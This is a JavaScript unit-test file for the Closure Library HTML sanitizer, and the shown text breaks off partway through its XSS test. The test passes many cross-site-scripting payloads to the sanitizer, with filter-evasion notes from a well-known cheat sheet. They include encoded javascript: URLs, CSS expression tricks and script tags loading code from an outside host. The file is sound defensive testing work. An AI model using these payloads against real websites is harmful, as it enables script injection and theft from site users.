CoCalc -- htmlsanitizer

GitHub Repository: seleniumhq/selenium
Path: blob/trunk/third_party/closure/goog/html/sanitizer/htmlsanitizer_test.js
2868 views
1
// Copyright 2016 The Closure Library Authors. All Rights Reserved.
2
//
3
// Licensed under the Apache License, Version 2.0 (the "License");
4
// you may not use this file except in compliance with the License.
5
// You may obtain a copy of the License at
6
//
7
//      http://www.apache.org/licenses/LICENSE-2.0
8
//
9
// Unless required by applicable law or agreed to in writing, software
10
// distributed under the License is distributed on an "AS-IS" BASIS,
11
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12
// See the License for the specific language governing permissions and
13
// limitations under the License.
14

15

16
/**
17
 * @fileoverview Unit tests for HTML Sanitizer
18
 */
19

20
goog.setTestOnly();
21

22
goog.require('goog.array');
23
goog.require('goog.dom');
24
goog.require('goog.html.SafeHtml');
25
goog.require('goog.html.SafeUrl');
26
goog.require('goog.html.sanitizer.HtmlSanitizer');
27
goog.require('goog.html.sanitizer.HtmlSanitizer.Builder');
28
goog.require('goog.html.sanitizer.TagWhitelist');
29
goog.require('goog.html.sanitizer.unsafe');
30
goog.require('goog.html.testing');
31
goog.require('goog.object');
32
goog.require('goog.string.Const');
33
goog.require('goog.testing.dom');
34
goog.require('goog.testing.jsunit');
35
goog.require('goog.userAgent');
36

37

38
/**
 * Detects Internet Explorer releases older than version 9.
 * @return {boolean} Whether the browser is IE8 or below.
 */
function isIE8() {
  var ua = goog.userAgent;
  var firstNewerVersion = 9;
  return ua.IE && !ua.isVersionOrHigher(firstNewerVersion);
}
44

45

46
/**
 * Detects Internet Explorer 9: an IE release below version 10 that isIE8()
 * does not already claim.
 * @return {boolean} Whether the browser is IE9.
 */
function isIE9() {
  var ua = goog.userAgent;
  var isIEBelow10 = ua.IE && !ua.isVersionOrHigher(10);
  return isIEBelow10 && !isIE8();
}
52

53

54
/**
 * Sanitizes the original HTML and asserts that the result matches the expected
 * HTML.
 *
 * When no sanitizer is supplied, a default one is created through the Builder
 * and the same check is then repeated with two sanitizers constructed directly:
 * one without a builder and one with an explicitly passed, unused builder.
 *
 * Browser-specific handling visible in this helper:
 * - IE9: the sanitized output is asserted to be the empty string and the helper
 *   returns immediately, so the direct-construction retries are skipped.
 * - IE8 and below: any error thrown while sanitizing or comparing is swallowed.
 *
 * @param {string} originalHtml HTML fed to the sanitizer.
 * @param {string} expectedHtml HTML the sanitized output must match.
 * @param {?goog.html.sanitizer.HtmlSanitizer=} opt_sanitizer Sanitizer to use
 *     instead of the default-built one. Supplying it disables the retries.
 */
function assertSanitizedHtml(originalHtml, expectedHtml, opt_sanitizer) {
  var sanitizer =
      opt_sanitizer || new goog.html.sanitizer.HtmlSanitizer.Builder().build();
  try {
    var sanitized = sanitizer.sanitize(originalHtml);
    if (isIE9()) {
      assertEquals('', goog.html.SafeHtml.unwrap(sanitized));
      return;
    }
    goog.testing.dom.assertHtmlMatches(
        expectedHtml, goog.html.SafeHtml.unwrap(sanitized),
        true /* opt_strictAttributes */);
  } catch (err) {
    // Only IE8 and below are allowed to fail here; everything else rethrows.
    if (!isIE8()) {
      throw err;
    }
  }
  if (!opt_sanitizer) {
    // Retry with raw sanitizer created without the builder.
    assertSanitizedHtml(
        originalHtml, expectedHtml, new goog.html.sanitizer.HtmlSanitizer());
    // Retry with an explicitly passed in Builder.
    var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
    assertSanitizedHtml(
        originalHtml, expectedHtml,
        new goog.html.sanitizer.HtmlSanitizer(builder));
  }
}
89

90

91
/**
 * Converts the SafeHtml to a node via goog.dom.safeHtmlToNode and reads the
 * inline style text from it.
 * @param {!goog.html.SafeHtml} safeHtml Sanitized HTML which contains a style.
 * @return {string} cssText contained within SafeHtml, or the empty string when
 *     the resulting node has no truthy style property.
 */
function getStyle(safeHtml) {
  var node = goog.dom.safeHtmlToNode(safeHtml);
  if (node.style) {
    return node.style.cssText;
  }
  return '';
}
99

100

101
/**
 * Verifies that already-safe snippets are left unchanged: each snippet is
 * passed to assertSanitizedHtml as both the input and the expected output.
 */
function testHtmlSanitizeSafeHtml() {
  var safeSnippets = [
    'hello world',
    '<b>hello world</b>',
    '<i>hello world</i>',
    '<u>hello world</u>',
    // NOTE(user): original did not have tbody
    '<table><tbody><tr><td>hello world</td></tr></tbody></table>',
    '<h1>hello world</h1>',
    '<div>hello world</div>',
    '<a>hello world</a>',
    '<div><span>hello world</span></div>',
    '<div><a target=\'_blank\'>hello world</a></div>'
  ];
  for (var i = 0; i < safeSnippets.length; i++) {
    var snippet = safeSnippets[i];
    assertSanitizedHtml(snippet, snippet);
  }
}
134

135

136
// TODO(pelizzi): name of test does not make sense
/**
 * Checks that an empty div passes through assertSanitizedHtml unchanged.
 */
function testDefaultCssSanitizeImage() {
  var emptyDiv = '<div></div>';
  assertSanitizedHtml(emptyDiv, emptyDiv);
}
141

142

143
/**
 * Verifies that a Builder is single-use: after one build() call, both a second
 * build() and passing the same builder to the HtmlSanitizer constructor are
 * expected to throw.
 */
function testBuilderCanOnlyBeUsedOnce() {
  var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
  // First use consumes the builder; the resulting sanitizer is not needed.
  builder.build();
  assertThrows(function() {
    builder.build();
  });
  assertThrows(function() {
    new goog.html.sanitizer.HtmlSanitizer(builder);
  });
}
153

154

155
/**
 * Verifies that a background image URL survives sanitization when the
 * sanitizer is built with allowCssStyles() and goog.html.SafeUrl.sanitize as
 * the custom network request URL policy.
 *
 * Browser-specific handling visible in this test:
 * - IE9: the sanitized output is asserted to be the empty string.
 * - IE8 and below: any error thrown by sanitizing or asserting is swallowed.
 */
function testAllowedCssSanitizeImage() {
  var testUrl = 'http://www.example.com/image3.jpg';
  var html = '<div style="background: url(' + testUrl + ');"></div>';

  var sanitizer =
      new goog.html.sanitizer.HtmlSanitizer.Builder()
          .allowCssStyles()
          .withCustomNetworkRequestUrlPolicy(goog.html.SafeUrl.sanitize)
          .build();

  try {
    var sanitizedHtml = sanitizer.sanitize(html);
    if (isIE9()) {
      assertEquals('', goog.html.SafeHtml.unwrap(sanitizedHtml));
      return;
    }
    // Dots in the host and file name are escaped so that only the literal test
    // URL matches. The optional character on either side of the URL allows for
    // a quote character around it.
    assertRegExp(
        /background(?:-image)?:.*url\(.?http:\/\/www\.example\.com\/image3\.jpg.?\)/,
        getStyle(sanitizedHtml));
  } catch (err) {
    // Only IE8 and below are allowed to fail here; everything else rethrows.
    if (!isIE8()) {
      throw err;
    }
  }
}
180

181

182
function testHtmlSanitizeXSS() {
183
  // NOTE(user): xss cheat sheet found on http://ha.ckers.org/xss.html
184
  var safeHtml, xssHtml;
185
  // Inserting <script> tags is unsafe
186
  // Browser Support [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
187
  safeHtml = '';
188
  xssHtml = '<SCRIPT SRC=xss.js><\/SCRIPT>';
189
  assertSanitizedHtml(xssHtml, safeHtml);
190
  // removes strings like javascript:, alert, etc
191
  // Image XSS using the javascript directive
192
  // Browser Support [IE6.0|IE8.0|NS8.1-IE]
193
  safeHtml = '<img />';
194
  xssHtml = '<IMG SRC="javascript:xss=true;">';
195
  assertSanitizedHtml(xssHtml, safeHtml);
196

197
  safeHtml = '<div><a>hello world</a></div>';
198
  xssHtml = '<div><a target=\'_xss\'>hello world</a></div>';
199
  assertSanitizedHtml(xssHtml, safeHtml);
200

201
  safeHtml = '';
202
  xssHtml = '<IFRAME SRC="javascript:xss=true;">';
203
  assertSanitizedHtml(xssHtml, safeHtml);
204

205
  safeHtml = '';
206
  xssHtml = '<iframe src=" javascript:xss=true;">';
207
  assertSanitizedHtml(xssHtml, safeHtml);
208

209
  // no quotes and no semicolon
210
  // Browser Support [IE6.0|NS8.1-IE]
211
  safeHtml = '<img />';
212
  xssHtml = '<IMG SRC=javascript:alert("XSS")>';
213
  assertSanitizedHtml(xssHtml, safeHtml);
214

215
  // case insensitive xss attack
216
  // Browser Support [IE6.0|NS8.1-IE]
217
  safeHtml = '<img />';
218
  xssHtml = '<IMG SRC=JaVaScRiPt:alert("XSS")>';
219
  assertSanitizedHtml(xssHtml, safeHtml);
220

221
  // HTML Entities
222
  // Browser Support [IE6.0|NS8.1-IE]
223
  safeHtml = '<img />';
224
  xssHtml = '<IMG SRC=javascript:alert(&quot;XSS&quot;)>';
225
  assertSanitizedHtml(xssHtml, safeHtml);
226

227
  // Grave accent obfuscation (If you need to use both double and single quotes
228
  // you can use a grave accent to encapsulate the JavaScript string)
229
  // Browser Support [IE6.0|NS8.1-IE]
230
  safeHtml = '<img />';
231
  xssHtml = '<IMG SRC=`javascript:alert("foo \'bar\'")`>';
232
  assertSanitizedHtml(xssHtml, safeHtml);
233

234
  safeHtml = '<img />';
235
  xssHtml = '<IMG data-xxx=`yyy`>';
236
  assertSanitizedHtml(xssHtml, safeHtml);
237

238
  // Malformed IMG tags
239
  // http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300
240
  // Browser Support [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
241
  safeHtml = '<img />"&gt;';
242
  xssHtml = '<IMG """><SCRIPT defer>exploited = true;<\/SCRIPT>">';
243
  assertSanitizedHtml(xssHtml, safeHtml);
244

245
  // UTF-8 Unicode encoding
246
  // Browser Support [IE6.0|NS8.1-IE]
247
  safeHtml = '<img />';
248
  xssHtml = '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;' +
249
      '&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;' +
250
      '&#41;>';
251
  assertSanitizedHtml(xssHtml, safeHtml);
252

253
  // Long UTF-8 Unicode encoding without semicolons (this is often effective
254
  // in XSS that attempts to look for "&#XX;", since most people don't know
255
  // about padding - up to 7 numeric characters total). This is also useful
256
  // against people who decode against strings like
257
  // $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon
258
  // is required to terminate a html encoded string:
259
  // Browser Support [IE6.0|NS8.1-IE]
260
  safeHtml = '<img />';
261
  xssHtml = '<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099' +
262
      '&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108' +
263
      '&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083' +
264
      '&#0000083&#0000039&#0000041>';
265
  assertSanitizedHtml(xssHtml, safeHtml);
266

267
  // Hex encoding without semicolons (this is also a viable XSS attack against
268
  // the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that
269
  // there is a numeric character following the pound symbol - which is not true
270
  // with hex HTML characters). Use the XSS calculator for more information:
271
  // Browser Support [IE6.0|NS8.1-IE]
272
  safeHtml = '<img />';
273
  xssHtml = '<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A' +
274
      '&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>';
275
  assertSanitizedHtml(xssHtml, safeHtml);
276

277
  // Embedded tab
278
  // Browser Support [IE6.0|NS8.1-IE]
279
  safeHtml = '<img />';
280
  xssHtml = '<IMG SRC="jav\tascript:xss=true;">';
281
  assertSanitizedHtml(xssHtml, safeHtml);
282

283
  // Embedded encoded tab
284
  // Browser Support [IE6.0|NS8.1-IE]
285
  safeHtml = '<img />';
286
  xssHtml = '<IMG SRC="jav&#x09;ascript:xss=true;">';
287
  assertSanitizedHtml(xssHtml, safeHtml);
288

289
  // Embedded newline to break up XSS. Some websites claim that any of the chars
290
  // 09-13 (decimal) will work for this attack. That is incorrect. Only 09
291
  // (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii
292
  // chart for more details. The following four XSS examples illustrate this
293
  // vector:
294
  // Browser Support [IE6.0|NS8.1-IE]
295
  safeHtml = '<img />';
296
  xssHtml = '<IMG SRC="jav&#x0A;ascript:xss=true;">';
297
  assertSanitizedHtml(xssHtml, safeHtml);
298

299
  // Multiline Injected JavaScript using ASCII carriage returns (same as above
300
  // only a more extreme example of this XSS vector) these are not spaces just
301
  // one of the three characters as described above:
302
  // Browser Support [IE6.0|NS8.1-IE]
303
  safeHtml = '<img />';
304
  xssHtml = '<IMG\nSRC\n=\n"\nj\na\nv\na\ns\nc\nr\ni\np\nt\n:\na\nl\ne\nr\nt' +
305
      '\n(\n"\nX\nS\nS\n"\n)\n"\n>';
306
  assertSanitizedHtml(xssHtml, safeHtml);
307

308
  // Null breaks up JavaScript directive. Okay, I lied, null chars also work as
309
  // XSS vectors but not like above, you need to inject them directly using
310
  // something like Burp Proxy or use %00 in the URL string or if you want to
311
  // write your own injection tool you can either use vim (^V^@ will produce a
312
  // null) or the following program to generate it into a text file. Okay, I
313
  // lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable
314
  // to one additional char 173 (the soft hyphen control char). But the null
315
  // char %00 is much more useful and helped me bypass certain real world
316
  // filters with a variation on this example:
317
  // Browser Support [IE6.0|IE7.0|NS8.1-IE]
318
  safeHtml = '<img />';
319
  xssHtml = '<IMG SRC=java\0script:alert("hey");>';
320
  assertSanitizedHtml(xssHtml, safeHtml);
321

322
  // On IE9, the null character actually causes us to only see <SCR. The
323
  // sanitizer on IE9 doesn't "recover as well" as other browsers but the
324
  // result is safe.
325
  safeHtml = isIE9() ? '' : '<span>alert("XSS")</span>';
326
  xssHtml = '<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>';
327
  assertSanitizedHtml(xssHtml, safeHtml);
328

329
  // Spaces and meta chars before the JavaScript in images for XSS (this is
330
  // useful if the pattern match doesn't take into account spaces in the word
331
  // "javascript:" -which is correct since that won't render- and makes the
332
  // false assumption that you can't have a space between the quote and the
333
  // "javascript:" keyword. The actual reality is you can have any char from
334
  // 1-32 in decimal):
335
  // Browser Support [IE7.0|NS8.1-IE]
336
  safeHtml = '<img />';
337
  xssHtml = '<IMG SRC=" &#14;  javascript:alert(window);">';
338
  assertSanitizedHtml(xssHtml, safeHtml);
339

340
  // Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I
341
  // found that it assumes a non-alpha-non-digit is not valid after an HTML
342
  // keyword and therefore considers it to be a whitespace or non-valid token
343
  // after an HTML tag. The problem is that some XSS filters assume that the
344
  // tag they are looking for is broken up by whitespace.
345
  // Browser Support [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
346
  safeHtml = '';
347
  xssHtml = '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
348
  assertSanitizedHtml(xssHtml, safeHtml);
349

350
  // Non-alpha-non-digit part 2 XSS. yawnmoth brought my attention to this
351
  // vector, based on the same idea as above, however, I expanded on it, using
352
  // my fuzzer. The Gecko rendering engine allows for any character other than
353
  // letters, numbers or encapsulation chars (like quotes, angle brackets,
354
  // etc...) between the event handler and the equals sign, making it easier
355
  // to bypass cross site scripting blocks. Note that this also applies to the
356
  // grave accent char as seen here:
357
  // Browser support: [NS8.1-G|FF2.0]
358
  safeHtml = '';
359
  xssHtml = '<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>';
360
  assertSanitizedHtml(xssHtml, safeHtml);
361

362
  // Non-alpha-non-digit part 3 XSS. Yair Amit brought this to my attention
363
  // that there is slightly different behavior between the IE and Gecko
364
  // rendering engines that allows just a slash between the tag and the
365
  // parameter with no spaces. This could be useful if the system does not
366
  // allow spaces.
367
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
368
  safeHtml = '';
369
  xssHtml = '<SCRIPT/SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
370
  assertSanitizedHtml(xssHtml, safeHtml);
371

372
  // Extraneous open brackets. Submitted by Franz Sedlmaier, this XSS vector
373
  // could defeat certain detection engines that work by first using matching
374
  // pairs of open and close angle brackets and then by doing a comparison of
375
  // the tag inside, instead of a more efficient algorithm like Boyer-Moore that
376
  // looks for entire string matches of the open angle bracket and associated
377
  // tag (post de-obfuscation, of course). The double slash comments out the
378
  // ending extraneous bracket to suppress a JavaScript error:
379
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
380
  safeHtml = '&lt;';
381
  xssHtml = '<<SCRIPT>xss=true;//<<\/SCRIPT>';
382
  assertSanitizedHtml(xssHtml, safeHtml);
383

384
  // No closing script tags. In Firefox and Netscape 8.1 in the Gecko rendering
385
  // engine mode you don't actually need the "><\/SCRIPT>" portion of this Cross
386
  // Site Scripting vector. Firefox assumes it's safe to close the HTML tag and
387
  // add closing tags for you. How thoughtful! Unlike the next one, which
388
  // doesn't affect Firefox, this does not require any additional HTML below it.
389
  // You can add quotes if you need to, but they're not needed generally,
390
  // although beware, I have no idea what the HTML will end up looking like once
391
  // this is injected:
392
  // Browser support: [NS8.1-G|FF2.0]
393
  safeHtml = '';
394
  xssHtml = '<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>';
395
  assertSanitizedHtml(xssHtml, safeHtml);
396

397
  // Protocol resolution in script tags. This particular variant was submitted
398
  // by Lukasz Pilorz and was based partially off of Ozh's protocol resolution
399
  // bypass below. This cross site scripting example works in IE, Netscape in
400
  // IE rendering mode and Opera if you add in a <\/SCRIPT> tag at the end.
401
  // However, this is especially useful where space is an issue, and of course,
402
  // the shorter your domain, the better. The ".j" is valid, regardless of the
403
  // encoding type because the browser knows it in context of a SCRIPT tag.
404
  // Browser support: [NS8.1-G|FF2.0]
405
  safeHtml = '';
406
  xssHtml = '<SCRIPT SRC=//ha.ckers.org/.j>';
407
  assertSanitizedHtml(xssHtml, safeHtml);
408

409
  // Half open HTML/JavaScript XSS vector. Unlike Firefox the IE rendering
410
  // engine doesn't add extra data to your page, but it does allow the
411
  // javascript: directive in images. This is useful as a vector because it
412
  // doesn't require a close angle bracket. This assumes there is any HTML tag
413
  // below where you are injecting this cross site scripting vector. Even though
414
  // there is no close ">" tag the tags below it will close it. A note: this
415
  // does mess up the HTML, depending on what HTML is beneath it. It gets around
416
  // the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/
417
  // because it doesn't require the end ">". As a side note, this was also
418
  // effective against a real world XSS filter I came across using an open
419
  // ended <IFRAME tag instead of an <IMG tag:
420
  // Browser support: [IE6.0|NS8.1-IE]
421
  safeHtml = isIE9() ? '<img>' : '';
422
  xssHtml = '<IMG SRC="javascript:alert(this)"';
423
  assertSanitizedHtml(xssHtml, safeHtml);
424

425
  // Double open angle brackets. This is an odd one that Steven Christey
426
  // brought to my attention. At first I misclassified this as the same XSS
427
  // vector as above but it's surprisingly different. Using an open angle
428
  // bracket at the end of the vector instead of a close angle bracket causes
429
  // different behavior in Netscape Gecko rendering. Without it, Firefox will
430
  // work but Netscape won't:
431
  // Browser support: [NS8.1-G|FF2.0]
432
  safeHtml = '';
433
  xssHtml = '<iframe src=http://ha.ckers.org/scriptlet.html <';
434
  assertSanitizedHtml(xssHtml, safeHtml);
435

436
  // End title tag. This is a simple XSS vector that closes <TITLE> tags,
437
  // which can encapsulate the malicious cross site scripting attack:
438
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
439
  safeHtml = '';
440
  xssHtml = '</TITLE><SCRIPT>alert(window);<\/SCRIPT>';
441
  assertSanitizedHtml(xssHtml, safeHtml);
442

443
  // Input Image.
444
  // Browser support: [IE6.0|NS8.1-IE]
445
  safeHtml = '<input type="IMAGE" />';
446
  xssHtml = '<INPUT TYPE="IMAGE" SRC="javascript:alert(window);">';
447
  assertSanitizedHtml(xssHtml, safeHtml);
448

449
  // Body image.
450
  // Browser support: [IE6.0|NS8.1-IE]
451
  safeHtml = '';
452
  xssHtml = '<BODY BACKGROUND="javascript:alert(window)">';
453
  assertSanitizedHtml(xssHtml, safeHtml);
454

455
  // BODY tag (I like this method because it doesn't require using any variants
456
  // of "javascript:" or "<SCRIPT..." to accomplish the XSS attack).
457
  // Dan Crowley additionally noted that you can put a space before the equals
458
  // sign ("onload=" != "onload ="):
459
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
460
  safeHtml = '';
461
  xssHtml = '<BODY ONLOAD=alert(window)>';
462
  assertSanitizedHtml(xssHtml, safeHtml);
463

464
  // IMG DYNSRC.
465
  // Browser support: [IE6.0|NS8.1-IE]
466
  safeHtml = '<img />';
467
  xssHtml = '<IMG DYNSRC="javascript:alert(window)">';
468
  assertSanitizedHtml(xssHtml, safeHtml);
469

470
  // IMG LOWSRC.
471
  // Browser support: [IE6.0|NS8.1-IE]
472
  safeHtml = '<img />';
473
  xssHtml = '<IMG LOWSRC="javascript:alert(window)">';
474
  assertSanitizedHtml(xssHtml, safeHtml);
475

476
  // BGSOUND
477
  safeHtml = '';
478
  xssHtml = '<BGSOUND SRC="javascript:alert(window);">';
479
  assertSanitizedHtml(xssHtml, safeHtml);
480

481
  // & Javascript includes
482
  // Browser support: netscape 4
483
  safeHtml = '<br size="&amp;{alert(window)}" />';
484
  xssHtml = '<BR SIZE="&{alert(window)}">';
485
  assertSanitizedHtml(xssHtml, safeHtml);
486

487
  // Layer
488
  // Browser support: netscape 4
489
  safeHtml = '';
490
  xssHtml = '<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>';
491
  assertSanitizedHtml(xssHtml, safeHtml);
492

493
  // STYLE sheet
494
  // Browser support: [IE6.0|NS8.1-IE]
495
  safeHtml = '';
496
  xssHtml = '<LINK REL="stylesheet" HREF="javascript:alert(window);">';
497
  assertSanitizedHtml(xssHtml, safeHtml);
498

499
  // List-style-image. Fairly esoteric issue dealing with embedding images for
500
  // bulleted lists. This will only work in the IE rendering engine because of
501
  // the JavaScript directive. Not a particularly useful cross site scripting
502
  // vector:
503
  // Browser support: [IE6.0|NS8.1-IE]
504
  safeHtml = '<ul><li>XSS</li></ul>';
505
  xssHtml = '<STYLE>li {list-style-image: url("javascript:alert(window)");}' +
506
      '</STYLE><UL><LI>XSS';
507
  assertSanitizedHtml(xssHtml, safeHtml);
508

509
  // VBscript in an image:
510
  // Browser support: [IE6.0|NS8.1-IE]
511
  safeHtml = '<img />';
512
  xssHtml = '<IMG SRC=\'vbscript:msgbox("XSS")\'>';
513
  assertSanitizedHtml(xssHtml, safeHtml);
514

515
  // Mocha in an image:
516
  // Browser support: [NS4]
517
  safeHtml = '<img />';
518
  xssHtml = '<IMG SRC="mocha:[code]">';
519
  assertSanitizedHtml(xssHtml, safeHtml);
520

521
  // Livescript in an image:
522
  // Browser support: [NS4]
523
  safeHtml = '<img />';
524
  xssHtml = '<IMG SRC="livescript:[code]">';
525
  assertSanitizedHtml(xssHtml, safeHtml);
526

527
  // META (the odd thing about meta refresh is that it doesn't send a referrer
528
  // in the header - so it can be used for certain types of attacks where you
529
  // need to get rid of referring URLs):
530
  // Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
531
  safeHtml = '';
532
  xssHtml = '<META HTTP-EQUIV="refresh" CONTENT="0;url=' +
533
      'javascript:alert(window);">';
534
  assertSanitizedHtml(xssHtml, safeHtml);
535

536
  // META using data: directive URL scheme. This is nice because it also doesnt
537
  // have anything visibly that has the word SCRIPT or the JavaScript directive
538
  // in it, because it utilizes base64 encoding. Please see RFC 2397 for more
539
  // details or go here or here to encode your own. You can also use the XSS
540
  // calculator below if you just want to encode raw HTML or JavaScript as it
541
  // has a Base64 encoding method:
542
  // Browser support: [NS8.1-G|FF2.0] [O9.02]
543
  safeHtml = '';
544
  xssHtml = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,' +
545
      'PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">';
546
  assertSanitizedHtml(xssHtml, safeHtml);
547

548
  // META with additional URL parameter. If the target website attempts to see
549
  // if the URL contains "http://" at the beginning you can evade it with the
550
  // following technique (Submitted by Moritz Naumann):
551
  safeHtml = '';
552
  xssHtml = '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=' +
553
      'javascript:alert(window);">';
554
  assertSanitizedHtml(xssHtml, safeHtml);
555

556
  // IFRAME (if iframes are allowed there are a lot of other XSS problems as
557
  // well):
558
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
559
  safeHtml = '';
560
  xssHtml = '<IFRAME SRC="javascript:alert(window);"></IFRAME>';
561
  assertSanitizedHtml(xssHtml, safeHtml);
562

563
  // FRAME (frames have the same sorts of XSS problems as iframes):
564
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
565
  safeHtml = '';
566
  xssHtml = '<FRAMESET><FRAME SRC="javascript:alert(window);"></FRAMESET>';
567
  assertSanitizedHtml(xssHtml, safeHtml);
568

569
  // TABLE (who would have thought tables were XSS targets... except me, of
570
  // course):
571
  // Browser support: [IE6.0|NS8.1-IE] [O9.02]
572
  safeHtml = isIE9() ? '<table><div></div></table>' : '<table></table>';
573
  xssHtml = '<TABLE BACKGROUND="javascript:alert(window)">';
574
  // TODO(danesh): Investigate why this is different for IE9.
575
  assertSanitizedHtml(xssHtml, safeHtml);
576

577
  // TD (just like above, TD's are vulnerable to BACKGROUNDs containing
578
  // JavaScript XSS vectors):
579
  // Browser support: [IE6.0|NS8.1-IE] [O9.02]
580
  // NOTE(user): original lacked tbody tags
581
  safeHtml = '<table><tbody><tr><td></td></tr></tbody></table>';
582
  xssHtml = '<TABLE><TD BACKGROUND="javascript:alert(window)">';
583
  assertSanitizedHtml(xssHtml, safeHtml);
584

585
  // DIV background-image (the same javascript: URL vector as above, carried in
586
  // an inline STYLE attribute instead of a BACKGROUND attribute):
587
  // Browser support: [IE6.0|NS8.1-IE] [O9.02]
588
  safeHtml = '<div></div>';
589
  xssHtml = '<DIV STYLE="background-image: url(javascript:alert(window))">';
590
  assertSanitizedHtml(xssHtml, safeHtml);
591

592
  // DIV background-image plus extra characters. I built a quick XSS fuzzer to
593
  // detect any erroneous characters that are allowed after the open parenthesis
594
  // but before the JavaScript directive in IE and Netscape 8.1 in secure site
595
  // mode. These are in decimal but you can include hex and add padding of
596
  // course. (Any of the following chars can be used: 1-32, 34, 39, 160,
597
  // 8192-8.13, 12288, 65279):
598
  // Browser support: [IE6.0|NS8.1-IE]
599
  safeHtml = '<div></div>';
600
  xssHtml = '<DIV STYLE="background-image: url(&#1;javascript:alert(window))">';
601
  assertSanitizedHtml(xssHtml, safeHtml);
602

603
  // DIV expression - a variant of this was effective against a real world
604
  // cross site scripting filter using a newline between the colon and
605
  // "expression":
606
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
607
  safeHtml = '<div></div>';
608
  xssHtml = '<DIV STYLE="width: expression(alert(window));">';
609
  assertSanitizedHtml(xssHtml, safeHtml);
610

611
  // STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE
612
  // into an infinite loop of alerts):
613
  // Browser support: [IE6.0|NS8.1-IE]
614
  safeHtml = '';
615
  xssHtml = '<STYLE>@im\port\'\ja\vasc\ript:alert(window)\';</STYLE>';
616
  assertSanitizedHtml(xssHtml, safeHtml);
617

618
  // STYLE attribute using a comment to break up expression (Thanks to Roman
619
  // Ivanov for this one):
620
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
621
  safeHtml = '<img />';
622
  xssHtml = '<IMG STYLE="xss:expr/*XSS*/ession(alert(window))">';
623
  assertSanitizedHtml(xssHtml, safeHtml);
624

625
  // Anonymous HTML with STYLE attribute (IE6.0 and Netscape 8.1+ in IE
626
  // rendering engine mode don't really care if the HTML tag you build exists
627
  // or not, as long as it starts with an open angle bracket and a letter):
628
  safeHtml = '<span></span>';
629
  xssHtml = '<XSS STYLE="xss:expression(alert(window))">';
630
  assertSanitizedHtml(xssHtml, safeHtml);
631

632
  // IMG STYLE with expression (this is really a hybrid of the above XSS
633
  // vectors, but it really does show how hard STYLE tags can be to parse apart,
634
  // like above this can send IE into a loop):
635
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
636
  safeHtml = isIE9() ? 'undefined' : 'exp/*<a></a>';
637
  xssHtml = 'exp/*<A STYLE="no\\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*' +
638
      '/*/pression(alert(window))">';
639
  assertSanitizedHtml(xssHtml, safeHtml);
640

641
  // STYLE tag (Older versions of Netscape only):
642
  // Browser support: [NS4]
643
  safeHtml = '';
644
  xssHtml = '<STYLE TYPE="text/javascript">xss=true;</STYLE>';
645
  assertSanitizedHtml(xssHtml, safeHtml);
646

647
  // STYLE tag using background-image:
648
  // Browser support: [IE6.0|NS8.1-IE]
649
  safeHtml = isIE9() ? 'undefined' : '<a></a>';
650
  xssHtml = '<STYLE>.XSS{background-image:url("javascript:alert("XSS")");}' +
651
      '</STYLE><A CLASS=XSS></A>';
652
  assertSanitizedHtml(xssHtml, safeHtml);
653

654
  // BASE tag. Works in IE and Netscape 8.1 in safe mode. You need the // to
655
  // comment out the next characters so you won't get a JavaScript error and
656
  // your XSS tag will render. Also, this relies on the fact that the website
657
  // uses dynamically placed images like "images/image.jpg" rather than full
658
  // paths. If the path includes a leading forward slash like
659
  // "/images/image.jpg" you can remove one slash from this vector (as long as
660
  // there are two to begin the comment this will work):
661
  // Browser support: [IE6.0|NS8.1-IE]
662
  safeHtml = '';
663
  xssHtml = '<BASE HREF="javascript:xss=true;//">';
664
  assertSanitizedHtml(xssHtml, safeHtml);
665

666
  // OBJECT tag (if they allow objects, you can also inject virus payloads to
667
  // infect the users, etc. and same with the APPLET tag). The linked file is
668
  // actually an HTML file that can contain your XSS:
669
  // Browser support: [O9.02]
670
  safeHtml = '';
671
